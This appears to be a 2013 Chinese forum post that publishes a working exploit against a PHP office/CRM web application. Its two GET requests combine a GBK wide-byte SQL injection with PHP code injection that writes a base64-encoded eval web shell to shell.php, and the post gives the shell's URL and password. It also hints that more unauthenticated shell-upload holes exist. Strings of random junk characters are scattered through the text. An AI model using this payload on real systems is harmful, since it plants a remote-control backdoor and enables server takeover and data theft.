此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.+ V+ e" l; y' d7 r- ` J
. r& e( t4 ]5 e5 `8 ~- d
. z# f) J" ~5 ^/ e5 G# R5 J' u# NEXP:5 d0 p5 y- l: j, x: \4 t7 R
`: }7 a2 |, A3 E8 r" {. a第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
) {2 | H5 a: C0 g5 f' J . R0 W" Z, w$ A3 n/ C M% {2 A
第二步: [GET]http://site/general/email/index.php
% a, l6 C/ D5 ?( K$ _. { * d& k# c1 d% P( E
SHELL: http://site/general/email/shell.php 密码C: ]. Z" e# X) M7 q
% r& N( P' P2 \% e `" s
6 r: K4 L) N- l( @
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好% L" d- i7 v( z1 d
3 [& L- k: B; F0 X' {2 m$ @* W. L0 |9 M+ _有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~$ E6 D5 ]1 M7 ^' g# P
/ H' N: }5 Y8 ]' V3 ^* e9 c. S
" K+ T5 P9 n/ k. L" I8 D |
发表于 2013-2-4 16:19:29
收藏
支持
反对